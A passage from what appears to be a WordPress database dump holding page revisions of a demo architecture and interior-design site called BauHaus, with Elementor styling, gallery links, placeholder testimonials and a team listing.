3)}.elementor-gallery-item__description{color:var(--description-text-color,#fff);width:100%}.elementor-gallery-item__title{color:var(--title-text-color,#fff);font-weight:700;width:100%}.elementor-gallery__titles-container{display:-webkit-box;display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap;-webkit-box-pack:var(--titles-container-justify-content,center);-ms-flex-pack:var(--titles-container-justify-content,center);justify-content:var(--titles-container-justify-content,center);margin-bottom:20px}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:before{background-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:before{background-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:before{border-color:var(--galleries-pointer-bg-color-hover);border-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:after{border-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:before{border-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:var(--galleries-pointer-border-width);border-right-width:0;border-top-width:0}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:after{border-left-width:0;border-bottom-width:0;border-right-width:var(--galleries-pointer-border-width);border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:0;border-right-width:0;border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:after{border-left-width:0;border-bottom-width:var(--galleries-pointer-border-width);border-right-width:var(--galleries-pointer-border-width);border-top-width:0}.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:after,.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:before,.elementor-gallery__titles-container .e--pointer-overline .elementor-item:before,.elementor-gallery__titles-container .e--pointer-underline .elementor-item:after{height:var(--galleries-pointer-border-width)}.elementor-gallery-title{--space-between:10px;cursor:pointer;color:#6d7882;font-weight:500;position:relative;padding:7px 14px;-webkit-transition:all .3s;-o-transition:all .3s;transition:all .3s}.elementor-gallery-title--active{color:#495157}.elementor-gallery-title:not(:last-child){margin-right:var(--space-between)}.elementor-gallery-item__title+.elementor-gallery-item__description{margin-top:var(--description-margin-top)}.e-gallery-item.elementor-gallery-item{-webkit-transition-property:all;-o-transition-property:all;transition-property:all}.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-bottom,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-left,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-right,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-top,.e-gallery-item:hover .elementor-gallery__item-overlay-bg,.e-gallery-item:hover .elementor-gallery__item-overlay-content,.e-gallery-item:hover .elementor-gallery__item-overlay-content__description,.e-gallery-item:hover .elementor-gallery__item-overlay-content__title{opacity:1}a.elementor-item.elementor-gallery-title{color:var(--galleries-title-color-normal)}a.elementor-item.elementor-gallery-title.elementor-item-active,a.elementor-item.elementor-gallery-title.highlighted,a.elementor-item.elementor-gallery-title:focus,a.elementor-item.elementor-gallery-title:hover{color:var(--galleries-title-color-hover)}a.elementor-item.elementor-gallery-title.elementor-item-active{color:var(--gallery-title-color-active)}.e-con-inner>.elementor-widget-gallery,.e-con>.elementor-widget-gallery{width:var(--container-widget-width,100%)}</style>		\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/commercial-1.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-fe2cde6\" data-elementor-lightbox-title=\"commercial-1\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgyNSwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL2NvbW1lcmNpYWwtMS5qcGciLCJzbGlkZXNob3ciOiJhbGwtZmUyY2RlNiJ9\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/commercial-2.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-fe2cde6\" data-elementor-lightbox-title=\"commercial-2\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgyNiwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL2NvbW1lcmNpYWwtMi5qcGciLCJzbGlkZXNob3ciOiJhbGwtZmUyY2RlNiJ9\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/commercial-3.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-fe2cde6\" data-elementor-lightbox-title=\"commercial-3\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgyNywidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL2NvbW1lcmNpYWwtMy5qcGciLCJzbGlkZXNob3ciOiJhbGwtZmUyY2RlNiJ9\">\n														</a>','Commercial','','inherit','closed','closed','','4681-revision-v1','','','2023-05-30 08:55:46','2023-05-30 08:55:46','',4681,'https://bauhaus.futuremediatrix.com/?p=4833',0,'revision','',0),(4836,3,'2023-09-22 08:20:08','2023-09-22 08:20:08','<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-get-to-know-us.jpg\" alt=\"\">\n						<h2>Architect</h2>\n														<h2>\n								REDESIGN LIFE							</h2>\n		<p>We believe that interior design is beyond aesthetic and function, it should represent personality and characteristic of a person. We capture the spirit, passion and taste of out client and apply them into design. Our brand spirit ‘’redesign life’’ is about giving major change to people’’s life and makes their home as inspiring place.</p>		\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"74\" height=\"74\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/avatar.jpg\" alt=\"\" loading=\"lazy\" />															\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h3>John Alan</h3>		\n		CO - FOUNDER		\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking about BauHaus							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/avatar.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n			<h2>Challenges in deploying\ninterior design applications</h2>		\n							Get your quote or call: 						\n					<ul>\n								<li>\n																					<a href=\"tel:1800111543 \">\n													+ 1800-111-543 												</a>\n																			</li>\n											</ul>\n			<a href=\"https://demo.ovatheme.com/retirio/contact\" role=\"button\">\n						Contact with us\n					</a>\n					0\n				    			        						<h4>\n							Project Completed						</h4>\n					0\n				    			        						<h4>\n							Architectures						</h4>\n					0\n				    			        						<h4>\n							Service providing						</h4>\n					0\n				    			        						<h4>\n							Happy customers						</h4>\n							<h3>Our Architects</h3>\n														<h2>\n								Our expert team							</h2>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-06.jpg\" alt=\"Aleesha brown\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n										Aleesha brown										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-05.jpg\" alt=\"Kevin martin\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n										Kevin martin										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-04.jpg\" alt=\"Sarah Albert\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n										Sarah Albert										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-03.jpg\" alt=\"David Cooper\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n										David Cooper										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-02.jpg\" alt=\"Christine eve\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n										Christine eve										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-01.jpg\" alt=\"Mike Hardson\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n										Mike Hardson										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05.jpg.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06.png\" alt=\"\" loading=\"lazy\" />','About','','inherit','closed','closed','','38-revision-v1','','','2023-09-22 08:20:08','2023-09-22 08:20:08','',38,'https://bauhaus.futuremediatrix.com/?p=4836',0,'revision','',0),(4837,3,'2023-09-22 08:20:08','2023-09-22 08:20:08','<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-get-to-know-us.jpg\" alt=\"\">\n						<h2>Architect</h2>\n														<h2>\n								REDESIGN LIFE							</h2>\n		<p>We believe that interior design is beyond aesthetic and function, it should represent personality and characteristic of a person. We capture the spirit, passion and taste of out client and apply them into design. Our brand spirit ‘’redesign life’’ is about giving major change to people’’s life and makes their home as inspiring place.</p>		\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"74\" height=\"74\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/avatar.jpg\" alt=\"\" loading=\"lazy\" />															\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h3>John Alan</h3>		\n		CO - FOUNDER		\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking about BauHaus							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/avatar.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n			<h2>Challenges in deploying\ninterior design applications</h2>		\n							Get your quote or call: 						\n					<ul>\n								<li>\n																					<a href=\"tel:1800111543 \">\n													+ 1800-111-543 												</a>\n																			</li>\n											</ul>\n			<a href=\"https://demo.ovatheme.com/retirio/contact\" role=\"button\">\n						Contact with us\n					</a>\n					0\n				    			        						<h4>\n							Project Completed						</h4>\n					0\n				    			        						<h4>\n							Architectures						</h4>\n					0\n				    			        						<h4>\n							Service providing						</h4>\n					0\n				    			        						<h4>\n							Happy customers						</h4>\n							<h3>Our Architects</h3>\n														<h2>\n								Our expert team							</h2>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-06.jpg\" alt=\"Aleesha brown\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n										Aleesha brown										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-05.jpg\" alt=\"Kevin martin\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n										Kevin martin										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-04.jpg\" alt=\"Sarah Albert\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n										Sarah Albert										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-03.jpg\" alt=\"David Cooper\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n										David Cooper										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-02.jpg\" alt=\"Christine eve\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n										Christine eve										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-01.jpg\" alt=\"Mike Hardson\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n										Mike Hardson										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05.jpg.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06.png\" alt=\"\" loading=\"lazy\" />','About','','inherit','closed','closed','','38-revision-v1','','','2023-09-22 08:20:08','2023-09-22 08:20:08','',38,'https://bauhaus.futuremediatrix.com/?p=4837',0,'revision','',0),(4838,3,'2023-09-22 08:20:09','2023-09-22 08:20:09','<img 